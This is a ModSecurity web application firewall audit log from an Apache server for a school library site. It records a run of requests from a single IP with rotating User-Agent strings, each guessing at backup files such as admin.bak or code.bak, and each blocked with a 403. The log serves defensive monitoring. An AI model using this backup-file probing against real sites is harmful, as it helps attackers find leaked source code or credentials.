Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b32c5a26-Z-- --4ca61c02-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon4gAAAAo 103.236.140.4 60826 103.236.140.4 8181 --4ca61c02-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165773318 --4ca61c02-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4ca61c02-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201504482 12614 (- - -) Stopwatch2: 1747683201504482 12614; combined=1514, p1=914, p2=571, p3=0, p4=0, p5=29, sr=387, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ca61c02-Z-- --b9bfcd53-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oAwAAAEw 103.236.140.4 59026 103.236.140.4 8181 --b9bfcd53-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149913636 --b9bfcd53-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b9bfcd53-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514296 3939 (- - -) Stopwatch2: 1747683201514296 3939; combined=689, p1=353, p2=310, p3=0, p4=0, p5=25, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bfcd53-Z-- --1162557f-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon5QAAAAE 103.236.140.4 59712 103.236.140.4 8181 --1162557f-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159449109 --1162557f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1162557f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201513476 6325 (- - -) Stopwatch2: 1747683201513476 6325; combined=611, p1=212, p2=369, p3=0, p4=0, p5=30, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1162557f-Z-- --31a6a51b-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n6gAAAFA 103.236.140.4 60862 103.236.140.4 8181 --31a6a51b-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148936204 --31a6a51b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31a6a51b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201504435 15777 (- - -) Stopwatch2: 1747683201504435 15777; combined=1035, p1=555, p2=442, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a6a51b-Z-- --298c1720-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n-wAAAEM 103.236.140.4 59444 103.236.140.4 8181 --298c1720-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1; rv:66.0.1) Gecko/20100101 Firefox/66.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 121648930 --298c1720-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --298c1720-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514232 7591 (- - -) Stopwatch2: 1747683201514232 7591; combined=633, p1=308, p2=298, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298c1720-Z-- --08fb2e55-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFoAAAANY 103.236.140.4 60868 103.236.140.4 8181 --08fb2e55-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:61.0.1) Gecko/20100101 Firefox/61.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166821897 --08fb2e55-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --08fb2e55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201516755 6463 (- - -) Stopwatch2: 1747683201516755 6463; combined=667, p1=354, p2=286, p3=0, p4=0, p5=26, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08fb2e55-Z-- --52ea272e-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon7AAAABA 103.236.140.4 59678 103.236.140.4 8181 --52ea272e-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168001539 --52ea272e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52ea272e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201522856 2606 (- - -) Stopwatch2: 1747683201522856 2606; combined=660, p1=314, p2=311, p3=0, p4=0, p5=34, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52ea272e-Z-- --8594352f-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFpwAAAMg 103.236.140.4 60820 103.236.140.4 8181 --8594352f-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164888588 --8594352f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8594352f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201521343 5596 (- - -) Stopwatch2: 1747683201521343 5596; combined=919, p1=344, p2=343, p3=0, p4=0, p5=232, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8594352f-Z-- --6c230662-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oEAAAAEU 103.236.140.4 59804 103.236.140.4 8181 --6c230662-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046201 --6c230662-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6c230662-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201525402 2042 (- - -) Stopwatch2: 1747683201525402 2042; combined=693, p1=327, p2=337, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c230662-Z-- --0ed3d335-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon7QAAABg 103.236.140.4 59638 103.236.140.4 8181 --0ed3d335-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166199308 --0ed3d335-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ed3d335-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201523051 4742 (- - -) Stopwatch2: 1747683201523051 4742; combined=1817, p1=468, p2=1319, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ed3d335-Z-- --4eee252b-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_pAAAAIQ 103.236.140.4 59070 103.236.140.4 8181 --4eee252b-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151158808 --4eee252b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4eee252b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201526933 1672 (- - -) Stopwatch2: 1747683201526933 1672; combined=629, p1=316, p2=288, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eee252b-Z-- --ebadcd02-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_qAAAAIM 103.236.140.4 60904 103.236.140.4 8181 --ebadcd02-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162758668 --ebadcd02-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ebadcd02-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201526093 6269 (- - -) Stopwatch2: 1747683201526093 6269; combined=729, p1=306, p2=389, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebadcd02-Z-- --c3d32e3c-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFswAAAM4 103.236.140.4 32784 103.236.140.4 8181 --c3d32e3c-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168034307 --c3d32e3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3d32e3c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201529807 3278 (- - -) Stopwatch2: 1747683201529807 3278; combined=719, p1=352, p2=342, p3=0, p4=0, p5=25, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d32e3c-Z-- --f539cf7e-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oGQAAAFE 103.236.140.4 59850 103.236.140.4 8181 --f539cf7e-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153976874 --f539cf7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f539cf7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201529367 6125 (- - -) Stopwatch2: 1747683201529367 6125; combined=771, p1=290, p2=457, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f539cf7e-Z-- --6dbc9214-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oJQAAAFA 103.236.140.4 59608 103.236.140.4 8181 --6dbc9214-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700101 --6dbc9214-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6dbc9214-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201793551 2616 (- - -) Stopwatch2: 1747683201793551 2616; combined=1038, p1=465, p2=533, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dbc9214-Z-- --7a854a22-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooOwAAAAI 103.236.140.4 59380 103.236.140.4 8181 --7a854a22-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167804940 --7a854a22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7a854a22-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201809317 2005 (- - -) Stopwatch2: 1747683201809317 2005; combined=725, p1=301, p2=384, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
